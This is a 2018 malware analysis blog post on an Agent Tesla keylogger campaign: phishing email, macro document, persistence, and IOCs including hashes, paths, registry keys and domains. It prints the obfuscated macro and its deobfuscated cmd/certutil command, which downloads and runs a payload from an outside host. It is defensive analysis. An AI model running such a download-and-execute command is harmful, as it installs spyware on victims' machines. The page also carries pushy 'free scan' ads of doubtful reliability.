1824
Home Malware Malware Analysis Report on new Agent Tesla (Keylogger Plus Spyware)
Malware Analysis Report on new Agent Tesla (Keylogger Plus Spyware) Malware Analysis Report on new Agent Tesla (Keylogger Plus Spyware)
Malware | 04/27/2018

Malware Analysis Report on new Agent Tesla (Keylogger Plus Spyware)


Complete technical report on malware analysis on new agent tesla. It’s a powerful keylogger with spyware capabilities. Purpose of agent tesla malware is to monitor the Victim’s System. It is a commercial keylogger, & can be purchased from its official website.

Agent Tesla Overview

Agent Tesla malware is a part of ‘Trojan.Keylogger’ family, the main purpose of this malware is to monitor the Victim’s System; it’s a modern powerful keylogger plus spyware capabilities.


Agent Tesla captures the screenshots of victim’s machine and also maintains the log in the encrypted form on the victim’s machine and sends it to the attacker’s address.


This Malware mostly spread via phishing campaigns which come in the form of the attached document or in the form of malicious links.


Agent Tesla is believed to be a commercial keylogger, and it can be easily purchased by anyone from its official website.


(hxxps://www[.]agenttesla[.]com/about)


Malware - Buzz! Check Malware on your Computer Now. One-Click-Install!:

Free Malware Scan


Let’s understand the process in detail:

This malware arrives via Email or Phishing Scams in the form of the attached document or through malicious links.(ex: hxxp://plubmerspro[.]us/Shippment Details[.]doc)

If the victim clicks on such a malicious link, the malicious document will automatically be downloaded on the victim’s machine.

If the user opens the malicious document in unprotected view, it will automatically start downloading the malware (if C&C server is active) & execute the malware on user’s system. Above link will download good.exe file(malware) in the background.

Good.exe will be renamed to eCDiXBI.exe and will be placed in the “%temp%” folder.

eCDiXBI.exe will execute the additional components on the user’s machine.


Let us do a Technical Analysis on ‘Agent Tesla Malware’ (Supported with Screenshots):

 

File Name: Shippment Details.doc

MD5: 60F3BDB1D39EF0A45A8C6E10A8ED12E7

File Type: Document

Arrival Method Via:  Email

 

Agent Tesla malware arrives via Email as shown in the screenshot:


agent tesla malware

Figure 1 Fake Email

 

If you will see the email in the source view, it will show the malicious link of the existing document file.


Virus- Buzz! Check Virus on your Computer Now. One-Click-Install!:

Free Virus Scan

Also, you can view this link at the status bar just by placing the mouse cursor on the ‘Click Here’ link.


agent tesla email malware orginal

Figure 2 Email Message Body Source


Once the user clicks on this link (Click here), it will download the document file on the user’s machine.


agent tesla email docoment orginal

 

As the user opens the document, it will show the warning message.


Is there a Spyware, adware, keylogger, virus and malware on your computer? Check Now! 

Check Your Computer Health(FREE)



In case, the user has enabled the security warning feature, this will disable the Macros.


And, if not, malicious script will be executed in the background or in case the user clicks on the enable content button; the malicious script will be executed.


 agent tesla  email malware document inside orginal


As you can see in the following screenshot, this document contains the malicious obfuscated macro code:


 agent tesla email malware coding orginal

Figure 3 Malicious Macro Function


As you can see in the above screenshot, ‘Malware actor’ has used the ‘Document_Open’ function event; which means if macro is enabled in the user’s system by default in Microsoft office settings.


Hence, by opening the document, malicious macro will start executing in the background.


As it can be seen below, main obfuscated malicious code which is written in such a way that no one can understand it easily.


"cWmBdr.welxWeZ I/ncJ Rcaear$tiuWtnillM.Qe_xUes p-MuNrRl$cTazc(hDe- W-)sHpGlSi*tO W-mfb ]h.tktPpT:^/^/Up leuDmPbie(rWsapCrcoU.fuZs#/Ogdoxo%da.Gelx[eS A%$teeomJpl%v\L\zeSCsD[igXfB.IF.EeYxZeE ^&E&o U%ot-eamup]%k\#\zeUCvDLipXQBOIh.FeXxTeQ"

 

When we will deobfuscate the above code, it will look like this:


cmd.[]exe /c certutil[.]exe -urlcache -split -f hxxp://plumberspro[.]us/good[.]exe %temp%\\eCDiXBI[.]exe && %temp%\\eCDiXBI[.]exe

 

The above malicious script will download the main malware payload on the user’s machine with the help of cmd.exe and certutil.exe.

 

As the above code is using the advantage of certuil.exe functionality; basically, certuil tool is used for dump and display CA (Certificate Authority) Certificates, Information & Keys, but here the malware actor is using it for the malicious purpose, the above malicious code will be download the good.exe file and that file will be saved into %temp% folder, renamed the good.exe to eCDiXBI.exe (This file is compiled into Autoit V3 tool) & executed the eCDiXBI.exe.

 

As you can see in the screenshot, we also captured the network activity where it clearly shows malicious macro attempts to download the file (good.exe) from the malicious site (hxxp://plumberspro[.]us)


 agent_tesla_screenshot1

Figure 4 Download good.exe


Following is the process tree (parent-child) relationship of malware, as you can see below how one document file infects the user’s machine with agent tesla malware.


agent tesla screenshot2

Figure 5 Process Tree of Agent Tesla Malware


As you can see in the above screenshot that eCDiXBI.exe created multiple sub processes and agent tesla malware shows the persistence behavior by making entries into schedule tasks.


eCDiXBI.exe drop its components into “%appdata%roaming” folder as shown in the screenshot.


agent tesla screenshot3


It created 5 different folders (firfox, Logs, M & T Bank Corporation, Screenshot, Windata) in hidden mode.

As you can see in the screenshot, firfox, M & T Bank Corporation and Windata folder contains the components of Agent Tesla Malware whereas Logs folder holds the logs file which captured the user’s keystroke and saved it into the encrypted format.


See Also: Anti Adware


Whereas, the screenshot folder contains the screenshot of the victim’s machine which keeps updating in every 5 Minutes.

agent tesla screenshot4


agent tesla screenshot5


‘eCDiXBI.exe’ also creates “dRQ0TehSm165.bat” file in %temp% folder which contains the following code to


  • Print the message on CMD (Don’t close This Window)
  • Ping the localhost 10 times
  • Start the firfox.exe
  • Deletes itself (dRQ0TehSm165.bat) from %temp% location.

 agent tesla malware screenshot6

eCDiXBI.exe also checks whether it’s running in debugger, following are some API’s that also shows that their monitoring and spying capabilities.


Isdebuggerpresent

CompareStringW

keybd_event

FileTimeToSystemTime

HttpOpenRequestW

ImageList_Create

HttpSendRequestW

SetPixel

FtpOpenFileW

SetCapture

 

As you see in the screenshot, hxxp://plumberspro[.]us have an open directory and anyone can easily download these malicious files which can be used for analysis purposes as well.

agent tesla mailware screenshot7

IOC’s (Indicator of Compromise)

Following are the folders and files are created by eCDiXBI.exe:


C:\Users\admin.admin-PC\AppData\Roaming\Microsoft\Windows\Templates\now.exe

C:\Users\admin.admin-PC\AppData\Roaming\M & T Bank Corporation

C:\Users\admin.admin-PC\AppData\Roaming\M & T Bank Corporation\M & T Bank Corporation.exe

C:\Users\ADMIN~1.ADM\AppData\Local\Temp\autF7C6.tmp

C:\Users\ADMIN~1.ADM\AppData\Local\Temp\ZMWNIT.exe

C:\Users\admin.admin-PC\AppData\Roaming\Windata

C:\Users\admin.admin-PC\AppData\Roaming\Windata\MDZYTH.exe

C:\Users\ADMIN~1.ADM\AppData\Local\Temp\Low

C:\Users\admin.admin-PC\AppData\Local\Temp\DI0.exe

C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab2040.tmp

C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar2041.tmp

C:\Users\admin.admin-PC\AppData\Roaming\firfox

C:\Users\admin.admin-PC\AppData\Roaming\firfox\firfox.exe

C:\Windows\System32\Tasks\firefox

C:\Users\admin.admin-PC\AppData\Roaming\Logs

C:\Users\ADMIN~1.ADM\AppData\Local\Temp\HTNYEL.vbs

PC\AppData\Roaming\ScreenShot

 

Registries Created:


HKLM\SOFTWARE\Microsoft\Tracing\firfox_RASAPI32\EnableFileTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\firfox_RASAPI32\EnableConsoleTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\firfox_RASAPI32\FileTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\firfox_RASAPI32\ConsoleTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\firfox_RASAPI32\MaxFileSize: 0x00100000

HKLM\SOFTWARE\Microsoft\Tracing\firfox_RASAPI32\FileDirectory: "%windir%\tracing"

HKLM\SOFTWARE\Microsoft\Tracing\firfox_RASMANCS\EnableFileTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\firfox_RASMANCS\EnableConsoleTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\firfox_RASMANCS\FileTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\firfox_RASMANCS\ConsoleTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\firfox_RASMANCS\MaxFileSize: 0x00100000

HKLM\SOFTWARE\Microsoft\Tracing\firfox_RASMANCS\FileDirectory: "%windir%\tracing"

HKLM\SOFTWARE\Microsoft\Tracing\MSBuild_RASAPI32\EnableFileTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\MSBuild_RASAPI32\EnableConsoleTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\MSBuild_RASAPI32\FileTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\MSBuild_RASAPI32\ConsoleTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\MSBuild_RASAPI32\MaxFileSize: 0x00100000

HKLM\SOFTWARE\Microsoft\Tracing\MSBuild_RASAPI32\FileDirectory: "%windir%\tracing"

HKLM\SOFTWARE\Microsoft\Tracing\MSBuild_RASMANCS\EnableFileTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\MSBuild_RASMANCS\EnableConsoleTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\MSBuild_RASMANCS\FileTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\MSBuild_RASMANCS\ConsoleTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\MSBuild_RASMANCS\MaxFileSize: 0x00100000

HKLM\SOFTWARE\Microsoft\Tracing\MSBuild_RASMANCS\FileDirectory: "%windir%\tracing"

HKLM\SOFTWARE\Microsoft\Tracing\now_RASAPI32\EnableFileTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\now_RASAPI32\EnableConsoleTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\now_RASAPI32\FileTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\now_RASAPI32\ConsoleTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\now_RASAPI32\MaxFileSize: 0x00100000

HKLM\SOFTWARE\Microsoft\Tracing\now_RASAPI32\FileDirectory: "%windir%\tracing"

HKLM\SOFTWARE\Microsoft\Tracing\now_RASMANCS\EnableFileTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\now_RASMANCS\EnableConsoleTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\now_RASMANCS\FileTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\now_RASMANCS\ConsoleTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\now_RASMANCS\MaxFileSize: 0x00100000

HKLM\SOFTWARE\Microsoft\Tracing\now_RASMANCS\FileDirectory: "%windir%\tracing"

HKLM\SOFTWARE\Microsoft\Tracing\ZMWNIT_RASAPI32\EnableFileTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\ZMWNIT_RASAPI32\EnableConsoleTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\ZMWNIT_RASAPI32\FileTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\ZMWNIT_RASAPI32\ConsoleTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\ZMWNIT_RASAPI32\MaxFileSize: 0x00100000

HKLM\SOFTWARE\Microsoft\Tracing\ZMWNIT_RASAPI32\FileDirectory: "%windir%\tracing"

HKLM\SOFTWARE\Microsoft\Tracing\ZMWNIT_RASMANCS\EnableFileTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\ZMWNIT_RASMANCS\EnableConsoleTracing: 0x00000000

HKLM\SOFTWARE\Microsoft\Tracing\ZMWNIT_RASMANCS\FileTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\ZMWNIT_RASMANCS\ConsoleTracingMask: 0xFFFF0000

HKLM\SOFTWARE\Microsoft\Tracing\ZMWNIT_RASMANCS\MaxFileSize: 0x00100000

HKLM\SOFTWARE\Microsoft\Tracing\ZMWNIT_RASMANCS\FileDirectory: "%windir%\tracing"

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{86329D0C-0B96-413F-9C0D-31CA5AC12D89}\Path: "\firefox"

 

Network Connections:


Domain

checkip.dyndns.org

plumberspro.us

ip-api.com

godstar.hopto.org

whatismyipaddress.com

www.centralbank.net.in

www.ip2location.com

route.carambo.la

logging.carambo.la

ap.lijit.com

ads.rubiconproject.com

image6.pubmatic.com

ic.tynt.com

pubmatic2waycm-atl.netmng.com

rp.gwallet.com

a.tribalfusion.com

 

Hashes:


File Name

MD5

DI0.exe

F683769B947501B5A98376619D5938BB

HTNYEL.vbs

FCB03DB8A35FD12366A738FBA371928A

ZMWNIT.exe

5A806563D7252BEE90F82EF8A74703F4

eCDiXBI.exe

BDEF9BD97744A8B7288F98BC6A81A1AD

Now.exe

409CAF6F1798BDB8F9142BA2CBCC5A28

M & T Bank Corporation.exe

1F13CD7F1ECB2A7BCC1FF5E287B7EB2E

 

Conclude:


As seen above, by visiting the malicious link and not using the protection mode in office suite will harm your system.


Once the malicious macro script is executed, it start’s infecting the victim machine with Agent Tesla Malware that records and monitors your personal activity and send it to Attacker’s C&C Server.

 

Newsletter

Are your devices Secure?

Best Anti-Malware program in 2018

ad_computer_work
Start Scan Now  Download Time: less than 1 minute
× Zoom Image
×

1

indicatorImg_logo
mlcsetup
2

3

1

2

3

1

2

3